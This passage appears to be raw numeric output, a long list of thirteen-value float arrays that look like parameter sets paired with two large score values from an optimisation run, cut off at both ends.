9.087619653117874e-10,\n 193351738763.71564, 100949387586.23102]\n[-8.372802930516975e-10, -1.343853363763315e-12, -1.9192642832280474e-13, \n 4.852404641399239e-11, -1.446871529700577e-10, -1.8130493256774034e-15,\n 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.836034443165441e-08, 9.087619653117874e-10, 197397120636.1133, \n 101220474756.86967]\n[-2.081071620571536e-10, -1.3430194729908366e-12, -1.9531413192683389e-13, \n 4.8687777307168814e-11, -1.432701673757514e-10, -1.8195538935082505e-15,\n 8.751158883884222e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.830053261436748e-08, 9.081976758127089e-10, 189380748448.52612, \n 101440046940.05927]\n[-8.372802930516975e-10, -1.3382357152930057e-12, -1.9531413192683389e-13, \n 4.869384519400452e-11, -1.432701673757514e-10, -1.815921924023075e-15, \n 8.834544584685654e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.836034443165441e-08, 9.087619653117874e-10, 198690577754.9655, \n 101467426817.57397]\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.924272863609467e-13, \n 4.8327983670281894e-11, -1.4675478300173032e-10, -\n 1.8258864221284576e-15, 8.83613368865103e-16, 2.492800478197597e-05, -\n 1.8015495121292713e-06, -1.8304452912365864e-08, 9.081976758127089e-10,\n 193392923341.53983, 101900620617.14302]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9719420123154376e-13, \n 4.861133464689211e-11, -1.483232636118454e-10, -1.8195538935082505e-15,\n 8.765174154706532e-16, 2.492800478197597e-05, -1.7966453439138136e-06, \n -1.836034443165441e-08, 9.087619653117874e-10, 174954502194.04602, \n 103131734300.077]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.814072294943091e-11, -1.437983579446461e-10, -1.8130493256774034e-15,\n 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.836034443165441e-08, 9.107645094765291e-10, 171249412831.2997, \n 103180541968.40872]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.476291648179518e-10, -1.7906363569860738e-15,\n 8.751158883884222e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.8221372696029056e-08, 9.081976758127089e-10, 154981149327.29538, \n 103805616436.34537]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.855683396544643e-11, -1.432701673757514e-10, -1.825643030416898e-15, \n 8.83613368865103e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -\n 1.81828896229741e-08, 9.081976758127089e-10, 158250536108.31226, \n 106843736334.12831]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9439448414369486e-13, \n 4.855683396544643e-11, -1.4675478300173032e-10, -1.8130493256774034e-15,\n 8.765174154706532e-16, 2.5187119035976227e-05, -1.797858272312416e-06, \n -1.836034443165441e-08, 9.087619653117874e-10, 148433419780.93826, \n 110030788135.34956]\n[-8.372802930516975e-10, -1.3382357152930057e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.432701673757514e-10, -1.799249889019179e-15, \n 8.765174154706532e-16, 2.4802576523291093e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.087619653117874e-10, 152744383578.88885, \n 111006224451.55664]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9475632661250835e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.815921924023075e-15,\n 8.83613368865103e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, \n -1.8140174569754755e-08, 9.081976758127089e-10, 140660582328.68314, \n 113087422800.04585]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.815921924023075e-15,\n 8.763652695826297e-16, 2.4957985197946978e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.081976758127089e-10, 148227079557.4723, \n 115101067854.69138]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15,\n 8.763652695826297e-16, 2.4957985197946978e-05, -1.7900208911755532e-06,\n -1.830053261436748e-08, 9.081976758127089e-10, 129686832886.01216, \n 126984206927.84627]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.869384519400452e-11, -1.4592095499147362e-10, -1.7864100157215748e-15,\n 8.706272486016714e-16, 2.5177177276929545e-05, -1.7997194394724915e-06,\n -1.850709631603352e-08, 9.087619653117874e-10, 188127979624.47858, \n 98138013390.26245]\n[-8.373514643167848e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.8139505305916955e-11, -1.4675478300173032e-10, -1.799249889019179e-15,\n 8.783887938075847e-16, 2.4957985197946978e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.035879148460716e-10, 195862055252.45816, \n 98829512345.71414]\n[-8.379785124926609e-10, -1.3292316984383345e-12, -1.955394873972143e-13, \n 4.852404641399239e-11, -1.4779126633130978e-10, -1.799249889019179e-15,\n 8.775397316555329e-16, 2.5049204386853816e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.035879148460716e-10, 183972070969.05157, \n 98891303611.42876]\n[-8.373750609204521e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.869384519400452e-11, -1.4659424506650604e-10, -1.7864100157215748e-15,\n 8.706272486016714e-16, 2.492800478197597e-05, -1.7997194394724915e-06, \n -1.836034443165441e-08, 9.087619653117874e-10, 176341783374.723, \n 99638222233.03885]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4696825367906723e-10, -1.799249889019179e-15,\n 8.705169785374419e-16, 2.4957985197946978e-05, -1.8015495121292713e-06,\n -1.836034443165441e-08, 9.087619653117874e-10, 187303786818.71506, \n 99962477826.90034]\n[-8.29844666406642e-10, -1.3259182588069894e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.803543054789903e-15,\n 8.839563844754409e-16, 2.492800478197597e-05, -1.799557982850986e-06, -\n 1.836034443165441e-08, 9.081976758127089e-10, 190148608462.3526, \n 100180028793.6191]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9475632661250835e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.803543054789903e-15,\n 8.839563844754409e-16, 2.4907384876305387e-05, -1.799557982850986e-06, \n -1.836034443165441e-08, 9.081976758127089e-10, 192885903228.52237, \n 100290100926.3771]\n[-8.372802930516975e-10, -1.340114474894997e-12, -1.9475632661250835e-13, \n 4.852404641399239e-11, -1.4659424506650604e-10, -1.803543054789903e-15,\n 8.839563844754409e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.836034443165441e-08, 9.087619653117874e-10, 193159834117.98853, \n 100447140164.3877]\n[-8.45347775440883e-10, -1.3359785407261977e-12, -1.9409478257397567e-13, \n 4.852404641399239e-11, -1.463585775827913e-10, -1.812045689500589e-15, \n 8.706272486016714e-16, 2.4957985197946978e-05, -1.8015495121292713e-06,\n -1.836034443165441e-08, 9.087619653117874e-10, 192907161589.0385, \n 100872818268.9527]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.8130493256774034e-15,\n 8.705169785374419e-16, 2.4957985197946978e-05, -1.7997194394724915e-06,\n -1.836034443165441e-08, 9.087619653117874e-10, 183710210581.81177, \n 101076246798.6337]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.869384519400452e-11, -1.432701673757514e-10, -1.8130493256774034e-15,\n 8.765174154706532e-16, 2.542150809952725e-05, -1.7997194394724915e-06, \n -1.850709631603352e-08, 9.087619653117874e-10, 168715457724.7375, \n 101683114493.3993]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.849645416672899e-11, -1.432701673757514e-10, -1.803543054789903e-15, \n 8.765174154706532e-16, 2.5177177276929545e-05, -1.7997194394724915e-06,\n -1.836034443165441e-08, 9.087619653117874e-10, 153789626574.96255, \n 105699410466.83022]\n[-8.372802930516975e-10, -1.3398025228100945e-12, -1.9531413192683389e-13, \n 4.855683396544643e-11, -1.4675478300173032e-10, -1.803543054789903e-15,\n 8.714032924475303e-16, 2.4957985197946978e-05, -1.793948394990656e-06, \n -1.836034443165441e-08, 9.081976758127089e-10, 159560429502.34207, \n 105861289429.36061]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.869384519400452e-11, -1.432701673757514e-10, -1.7864100157215748e-15,\n 8.765174154706532e-16, 2.5177177276929545e-05, -1.7997194394724915e-06,\n -1.836034443165441e-08, 9.087619653117874e-10, 147461834890.53723, \n 106068644665.40553]\n[-8.372802930516975e-10, -1.3292316984383345e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4760843266911815e-10, -1.7864100157215748e-15,\n 8.706272486016714e-16, 2.492800478197597e-05, -1.7933608637070708e-06, \n -1.836034443165441e-08, 9.087979750822277e-10, 147793960453.4741, \n 109638154986.2024]\n[-8.29844666406642e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.8434260838579935e-11, -1.4561659265574012e-10, -1.819718397269023e-15,\n 8.775397316555329e-16, 2.4948775411850268e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.081976758127089e-10, 150492287670.62976, \n 114344342719.97507]\n[-8.406587076953522e-10, -1.318355348076889e-12, -1.9519777560623135e-13, \n 4.855683396544643e-11, -1.4760843266911815e-10, -1.815921924023075e-15,\n 8.839563844754409e-16, 2.4957985197946978e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.081976758127089e-10, 148227079557.78632, \n 115101067854.31332]\n[-8.389236670603421e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15,\n 8.717072130867646e-16, 2.4957985197946978e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.087619653117874e-10, 137339476236.27339, \n 120797794814.05704]\n[-8.373514643167848e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15,\n 8.705169785374419e-16, 2.492800478197597e-05, -1.786297491730252e-06, -\n 1.836034443165441e-08, 9.087619653117874e-10, 128365631923.39072, \n 133721716481.47603]\n[-8.361552586353477e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15,\n 8.705169785374419e-16, 2.483403849637781e-05, -1.783565701728919e-06, -\n 1.836034443165441e-08, 9.095300241628919e-10, 123047993752.2489, \n 147005409641.27127]\n[-9.129396902499863e-10, -1.290047843436073e-12, -2.702634930634393e-13, \n 4.58556551164694e-11, -1.8724359625458014e-10, -2.1792166675464865e-15,\n 9.365717147446797e-16, 1.8994698205972217e-05, -1.8050933870374392e-06,\n -1.3360134446642706e-08, 8.693561802236366e-10, 169675879824.58978, \n 156722470654.13324]\n[6.303262263534727e-10, -1.2096663849982051e-12, -2.5988950272728827e-13, \n 4.701662665204773e-11, -1.4934765549498044e-10, -2.0495920936053975e-15,\n 8.502785255135087e-16, 1.8814769194136882e-05, -1.8050933870374392e-06,\n -1.3247752346374906e-08, 8.693561802236366e-10, 108072398467.48868, \n 167972224844.19583]\n[6.303262263534727e-10, -1.2096663849982051e-12, -2.5988950272728827e-13, \n 4.701662665204773e-11, -1.4986345441105813e-10, -2.0495920936053975e-15,\n 8.502785255135087e-16, 1.8814769194136882e-05, -1.8050933870374392e-06,\n -1.3247752346374906e-08, 8.693561802236366e-10, 108072398467.75635, \n 167972224843.92523]\n[-9.212545260772544e-10, -1.290047843436073e-12, -1.8356995493902235e-13, \n 4.58556551164694e-11, -1.8724359625458014e-10, -2.1913589342035502e-15,\n 9.365717147446797e-16, 1.9540146753875297e-05, -1.8050933870374392e-06,\n -1.3360134446642706e-08, 8.693561802236366e-10, 117723326371.03189, \n 192873830899.82352]\n[6.303262263534727e-10, -1.290047843436073e-12, -2.5988950272728827e-13, \n 4.58556551164694e-11, -1.4986345441105813e-10, -2.1913589342035502e-15,\n 8.502785255135087e-16, 1.8814769194136882e-05, -1.8050933870374392e-06,\n -1.3247752346374906e-08, 8.693561802236366e-10, 164354464752.25952, \n 160840990423.46024]\n[6.354744988103506e-10, -1.2096663849982051e-12, -1.830526663998671e-13, \n 4.6589669053151376e-11, -1.4986345441105813e-10, -\n 2.0495920936053975e-15, 8.502785255135087e-16, 1.894858193847651e-05, -\n 1.8050933870374392e-06, -1.3247752346374906e-08, 8.693561802236366e-10,\n 96467208837.94556, 179586543004.98117]\n[-9.212545260772544e-10, -1.290047843436073e-12, -1.8356995493902235e-13, \n 4.58556551164694e-11, -1.8580228849463816e-10, -2.1913589342035502e-15,\n 9.365717147446797e-16, 1.9540146753875297e-05, -1.8218396850604304e-06,\n -1.3360134446642706e-08, 8.759216763039946e-10, 117765020064.66293, \n 187118262382.8758]\n[-9.129396902499863e-10, -1.3004166005044262e-12, -1.8356995493902235e-13, \n 4.58556551164694e-11, -1.8724359625458014e-10, -2.1913589342035502e-15,\n 9.365717147446797e-16, 1.962681376929987e-05, -1.8050933870374392e-06, \n -1.3418860642065019e-08, 8.693561802236366e-10, 122674650037.46736, \n 187415567631.77402]\n[-9.212545260772544e-10, -1.2799153483071088e-12, -1.8213920664100724e-13, \n 4.58556551164694e-11, -1.8724359625458014e-10, -2.1913589342035502e-15,\n 9.365717147446797e-16, 1.9540146753875297e-05, -1.8050933870374392e-06,\n -1.3360134446642706e-08, 8.693561802236366e-10, 117723326371.03189, \n 192873830899.82352]\n[-9.212545260772544e-10, -1.290047843436073e-12, -1.8356995493902235e-13, \n 4.6154548476823616e-11, -1.8724359625458014e-10, -\n 2.1913589342035502e-15, 9.358479354640953e-16, 1.9540146753875297e-05, \n -1.8050933870374392e-06, -1.3360134446642706e-08, 8.693561802236366e-10,\n 117723326371.02731, 192873830899.82806]\n[2.2152115305769157e-10, -1.6907719215642795e-12, -2.5108769063589337e-13, \n 4.9793760275117476e-11, -2.0780774158604122e-10, -\n 2.1593626664102876e-15, 8.836470142939426e-16, 2.0200374650352852e-05, \n -1.7639524821935923e-06, -1.5013783998899997e-08, 8.77876424822685e-10,\n 170388218306.66492, 168925348515.4128]\n[2.2152115305769157e-10, -1.6907719215642795e-12, -2.1051647732787472e-13, \n 4.9793760275117476e-11, -2.0780774158604122e-10, -\n 2.1790706433018085e-15, 8.836470142939426e-16, 2.0343533479720338e-05, \n -1.7639524821935923e-06, -1.5091093694835327e-08, 8.771058818345121e-10,\n 191821821495.1242, 158798904598.69617]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -2.1593626664102876e-15,\n 8.836470142939426e-16, 2.0217203662255432e-05, -1.7639524821935923e-06,\n -1.5013783998899997e-08, 8.771058818345121e-10, 177069079234.4985, \n 163375067226.8736]\n[2.213664545134999e-10, -1.2059133330572482e-12, -2.5108769063589337e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -2.1593626664102876e-15,\n 8.836470142939426e-16, 2.0200374650352852e-05, -1.7639524821935923e-06,\n -1.508245699810314e-08, 8.771058818345121e-10, 197879714583.27084, \n 152444791757.7255]\n[0.0, -1.223723210207519e-12, -2.1051647732787472e-13, \n 4.971358693780409e-11, -1.7352085678160897e-10, -2.165433707987142e-15,\n 7.304553415989529e-16, 2.0047355685146273e-05, -1.7657604268720381e-06,\n -1.4977385439375226e-08, 8.771058818345121e-10, 197945074606.02325, \n 153164597685.87036]\n[2.2152115305769157e-10, -1.1984578022968498e-12, -2.5108769063589337e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.8426407940693324e-15,\n 7.430575474541962e-16, 2.0200374650352852e-05, -1.7639524821935923e-06,\n -1.5202351660972107e-08, 8.771058818345121e-10, 111986329581.05826, \n 155849166742.8801]\n[2.2133713135172913e-10, -1.2059133330572482e-12, -2.5107145183244764e-13, \n 5.011120217163613e-11, -1.724660990140153e-10, -2.1790706433018085e-15,\n 8.836470142939426e-16, 2.0200374650352852e-05, -1.7639524821935923e-06,\n -1.5013783998899997e-08, 8.771058818345121e-10, 187269085984.5673, \n 161472427331.15216]\n[0.0, -1.223723210207519e-12, -2.094909506024221e-13, 5.011120217163613e-11,\n -1.7677981323511262e-10, -2.145058695065051e-15, 7.430575474541962e-16,\n 2.0053347897812537e-05, -1.7639524821935923e-06, -\n 1.4682044872577598e-08, 8.728626586100963e-10, 152433850624.54852, \n 175966043507.07343]\n[0.0, -1.223723210207519e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -2.1790706433018085e-15,\n 7.430575474541962e-16, 1.9918519209106862e-05, -1.7685796144533914e-06,\n -1.4682044872577598e-08, 8.771058818345121e-10, 153535961138.3572, \n 184829802626.36642]\n[2.2152115305769157e-10, -1.200937983572784e-12, -2.1065990049856794e-13, \n 5.011120217163613e-11, -1.7420072583381303e-10, -1.8426407940693324e-15,\n 7.454251311051652e-16, 2.0200374650352852e-05, -1.7639524821935923e-06,\n -1.508245699810314e-08, 8.771058818345121e-10, 92670242378.77588, \n 189416231139.84406]\n[0.0, -1.2207456906260254e-12, -2.1065990049856794e-13, \n 4.9793760275117476e-11, -2.0772853669541976e-10, -\n 1.8426407940693324e-15, 7.430575474541962e-16, 1.9867416915370552e-05, \n -1.7639524821935923e-06, -1.5091093694835327e-08, 8.728626586100963e-10,\n 160631139543.06137, 122019730569.7476]\n[2.2152115305769157e-10, -1.1984578022968498e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7677981323511262e-10, -1.857281675942834e-15,\n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.5202351660972107e-08, 8.771058818345121e-10, 153487531028.94116, \n 128597452665.91768]\n[0.0, -1.2031098015567e-12, -2.5161591646068603e-13, 5.011120217163613e-11,\n -1.7849498396021264e-10, -1.82610373802557e-15, 7.430575474541962e-16, \n 1.981538293869461e-05, -1.7639524821935923e-06, -1.5202351660972107e-08,\n 8.771058818345121e-10, 142632578694.80914, 130195065921.46504]\n[2.2152115305769157e-10, -1.2003583976149596e-12, -2.5108769063589337e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.8426407940693324e-15,\n 7.430575474541962e-16, 2.0200374650352852e-05, -1.7639524821935923e-06,\n -1.517941226634992e-08, 8.771058818345121e-10, 107861636975.64659, \n 161449199082.99103]\n[0.0, -1.223723210207519e-12, -2.094909506024221e-13, 5.011120217163613e-11,\n -1.7677981323511262e-10, -1.857281675942834e-15, 7.430575474541962e-16,\n 1.981538293869461e-05, -1.769936435419886e-06, -1.4682044872577598e-08,\n 8.728626586100963e-10, 100156348461.68698, 161778485371.36353]\n[0.0, -1.1984578022968498e-12, -2.1065990049856794e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.8426407940693324e-15,\n 7.430575474541962e-16, 2.0200374650352852e-05, -1.7639524821935923e-06,\n -1.5091093694835327e-08, 8.760544278271184e-10, 100072993312.46272, \n 171303112707.4717]\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.088572649745598e-13, \n 4.9793760275117476e-11, -1.7352085678160897e-10, -\n 1.8261648304268637e-15, 8.836470142939426e-16, 2.0343533479720338e-05, \n -1.7639524821935923e-06, -1.5202351660972107e-08, 8.771058818345121e-10,\n 97245352689.07887, 174341101475.58182]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 4.9675085987122204e-11, -1.7558160485557454e-10, -\n 1.8426407940693324e-15, 8.836470142939426e-16, 2.022642042947946e-05, -\n 1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10,\n 92503635735.71886, 182996786041.40976]\n[0.0, -1.223723210207519e-12, -2.094909506024221e-13, 5.011120217163613e-11,\n -1.7677981323511262e-10, -2.1612081417375267e-15, 7.470344646267989e-16,\n 2.0053347897812537e-05, -1.7639524821935923e-06, -\n 1.4645406166689473e-08, 8.730660207999707e-10, 148185335900.70355, \n 185221791801.95062]\n[2.2111462065028517e-10, -1.2207456906260254e-12, -2.1065990049856794e-13, \n 5.056589741460715e-11, -1.7420072583381303e-10, -1.8426407940693324e-15,\n 7.454251311051652e-16, 2.0200374650352852e-05, -1.7639524821935923e-06,\n -1.508245699810314e-08, 8.771058818345121e-10, 92670242378.76936, \n 189416231139.85312]\n[2.2152115305769157e-10, -1.2207456906260254e-12, -2.1065990049856794e-13, \n 5.011120217163613e-11, -1.7420072583381303e-10, -1.8276902524925885e-15,\n 8.836470142939426e-16, 2.0200374650352852e-05, -1.7639524821935923e-06,\n -1.5091093694835327e-08, 8.771058818345121e-10, 90666406593.2125, \n 190153350507.14474]\n[2.2152115305769157e-10, -1.2049195466583994e-12, -2.1065990049856794e-13, \n 4.98075339514226e-11, -1.7558160485557454e-10, -1.8426407940693324e-15,\n 7.454251311051652e-16, 2.0095046248399238e-05, -1.7639524821935923e-06,\n -1.5013783998899997e-08, 8.771058818345121e-10, 89706134652.28279, \n 197738317572.1617]\n[0.0, -1.2031098015567e-12, -2.1065990049856794e-13, 5.0102593857564815e-11,\n -1.7352085678160897e-10, -1.819039898810471e-15, 7.460417812765263e-16,\n 2.0200374650352852e-05, -1.7758673160173464e-06, -\n 1.5202351660972107e-08, 8.760544278271184e-10, 160476853944.9334, \n 119035825863.27417]\n[2.2152115305769157e-10, -1.2031098015567e-12, -2.5161591646068603e-13, \n 4.9793760275117476e-11, -1.7849498396021264e-10, -1.82610373802557e-15,\n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.5344868185414675e-08, 8.771058818345121e-10, 180743589801.84604, \n 120144468135.82727]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 4.947687927376915e-11, -1.7558160485557454e-10, -1.8426407940693324e-15,\n 8.836470142939426e-16, 2.04140411384885e-05, -1.7639524821935923e-06, -\n 1.5078308038358913e-08, 8.683463468773267e-10, 146622662638.346, \n 120359956158.03543]\n[0.0, -1.1984578022968498e-12, -2.094909506024221e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.857281675942834e-15,\n 7.430575474541962e-16, 2.0200374650352852e-05, -1.7813149517985466e-06,\n -1.5091093694835327e-08, 8.760544278271184e-10, 171477577754.58575, \n 120995758664.39177]\n[2.2152115305769157e-10, -1.1984578022968498e-12, -2.5108769063589337e-13, \n 4.9967768219433575e-11, -1.7352085678160897e-10, -\n 1.8426407940693324e-15, 7.430575474541962e-16, 2.0200374650352852e-05, \n -1.7639524821935923e-06, -1.5091093694835327e-08, 8.703632209100975e-10,\n 151029089477.88403, 121221447183.73479]\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.088572649745598e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15,\n 7.430575474541962e-16, 2.0343533479720338e-05, -1.7639524821935923e-06,\n -1.520980077906525e-08, 8.721578527250325e-10, 139696562348.4149, \n 123962248783.03809]\n[2.233355889138985e-10, -1.2031098015567e-12, -2.5108769063589337e-13, \n 5.011120217163613e-11, -1.7849498396021264e-10, -1.8426407940693324e-15,\n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.5202351660972107e-08, 8.771058818345121e-10, 148301377250.4212, \n 129257349906.46594]\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.088572649745598e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15,\n 7.448076765658434e-16, 2.0200374650352852e-05, -1.7728642137544318e-06,\n -1.517941226634992e-08, 8.771058818345121e-10, 131981382341.97574, \n 129372470770.49553]\n[0.0, -1.2031098015567e-12, -2.088572649745598e-13, 5.011120217163613e-11, \n -1.7849498396021264e-10, -1.82610373802557e-15, 8.836470142939426e-16, \n 1.981538293869461e-05, -1.7639524821935923e-06, -1.5202351660972107e-08,\n 8.771058818345121e-10, 142632578694.80914, 130195065921.46504]\n[-5.2595470648843136e-09, -1.2003583976149596e-12, -2.5161591646068603e-13,\n 5.011120217163613e-11, -1.7461898455625076e-10, -1.8426407940693324e-15,\n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.517941226634992e-08, 8.771058818345121e-10, 142718091682.67987, \n 132029509845.4832]\n[2.2257852388875064e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 4.9793760275117476e-11, -1.7380412465809723e-10, -1.841021101878205e-15,\n 8.836470142939426e-16, 2.022642042947946e-05, -1.7639524821935923e-06, \n -1.5202351660972107e-08, 8.750599822793858e-10, 126150709659.35735, \n 137741348069.72827]\n[0.0, -1.2344709098355012e-12, -2.090479539659853e-13, \n 5.011120217163613e-11, -1.7849498396021264e-10, -1.857281675942834e-15,\n 7.485411998460075e-16, 1.981538293869461e-05, -1.769936435419886e-06, -\n 1.4682044872577598e-08, 8.711551918674385e-10, 114088676894.18327, \n 143862344272.2216]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7558160485557454e-10, -1.82610373802557e-15, \n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.750599822793858e-10, 119621740814.33159, \n 143868003797.30536]\n[2.2152115305769157e-10, -1.2003583976149596e-12, -2.088572649745598e-13, \n 4.995108013618423e-11, -1.7207960562590789e-10, -1.8426407940693324e-15,\n 8.836470142939426e-16, 2.015341505664753e-05, -1.7639524821935923e-06, \n -1.5202351660972107e-08, 8.771058818345121e-10, 115848531243.76457, \n 151496866956.06183]\n[7.878840270455085e-09, -1.2071709641632366e-12, -2.088572649745598e-13, \n 5.022894055850661e-11, -1.7352085678160897e-10, -1.8610445297760222e-15,\n 7.430575474541962e-16, 2.0343533479720338e-05, -1.7639524821935923e-06,\n -1.5202351660972107e-08, 8.760544278271184e-10, 113456911424.16617, \n 154679332976.7693]\n[0.0, -1.2031098015567e-12, -2.5161591646068603e-13, 5.011120217163613e-11,\n -1.7352085678160897e-10, -1.82610373802557e-15, 7.430575474541962e-16, \n 1.983133919352831e-05, -1.7639524821935923e-06, -1.500055802123721e-08,\n 8.760544278271184e-10, 107979663117.77498, 158587944243.3901]\n[2.2152115305769157e-10, -1.2003583976149596e-12, -2.5108769063589337e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.8426407940693324e-15,\n 7.451496753853957e-16, 2.0200374650352852e-05, -1.7639524821935923e-06,\n -1.517941226634992e-08, 8.771058818345121e-10, 107861636975.64659, \n 161449199082.99103]\n[2.1977210438689425e-10, -1.2003583976149596e-12, -2.5108769063589337e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.8426407940693324e-15,\n 8.836470142939426e-16, 2.0200374650352852e-05, -1.7639524821935923e-06,\n -1.517941226634992e-08, 8.771058818345121e-10, 107861636975.64659, \n 161449199082.99103]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.099781497267347e-13, \n 4.9793760275117476e-11, -1.7558160485557454e-10, -\n 1.8426407940693324e-15, 8.836470142939426e-16, 2.0299458575301996e-05, \n -1.756844278469525e-06, -1.5202351660972107e-08, 8.750599822793858e-10,\n 101036412554.48618, 178952195751.12357]\n[0.0, -1.2071709641632366e-12, -2.088572649745598e-13, \n 4.9793760275117476e-11, -1.7352085678160897e-10, -\n 1.8426407940693324e-15, 8.836470142939426e-16, 2.0200374650352852e-05, \n -1.7587739009571313e-06, -1.5202351660972107e-08, 8.768692858683927e-10,\n 101115281125.52821, 181312381109.07834]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 4.9675085987122204e-11, -1.7558160485557454e-10, -\n 1.8426407940693324e-15, 8.836470142939426e-16, 2.022642042947946e-05, -\n 1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10,\n 92503635735.71886, 182996786041.40976]\n[2.2295275331941093e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 4.9675085987122204e-11, -1.7558160485557454e-10, -\n 1.8426407940693324e-15, 8.836470142939426e-16, 2.022642042947946e-05, -\n 1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10,\n 92503635735.71886, 182996786041.40976]\n[0.0, -1.223723210207519e-12, -2.1065990049856794e-13, \n 5.011120217163613e-11, -1.7707453284878416e-10, -1.866210682668369e-15,\n 7.430575474541962e-16, 1.9722774245768875e-05, -1.769936435419886e-06, \n -1.4682044872577598e-08, 8.760544278271184e-10, 88317753591.74515, \n 193403737351.61066]\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.5161591646068603e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15,\n 7.430575474541962e-16, 2.0343533479720338e-05, -1.7493239251088378e-06,\n -1.5085870105283375e-08, 8.701394499644777e-10, 90763281590.1167, \n 199093039398.6542]\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.088572649745598e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.857281675942834e-15,\n 7.387655049943961e-16, 1.981538293869461e-05, -1.769936435419886e-06, -\n 1.4563889985865401e-08, 8.644597543611974e-10, 157634872361.7637, \n 120593643708.66519]\n[2.2257852388875064e-10, -1.2070230966272908e-12, -2.1051647732787472e-13, \n 5.027931250826744e-11, -1.755220169767042e-10, -1.810973414699955e-15, \n 7.430575474541962e-16, 1.981538293869461e-05, 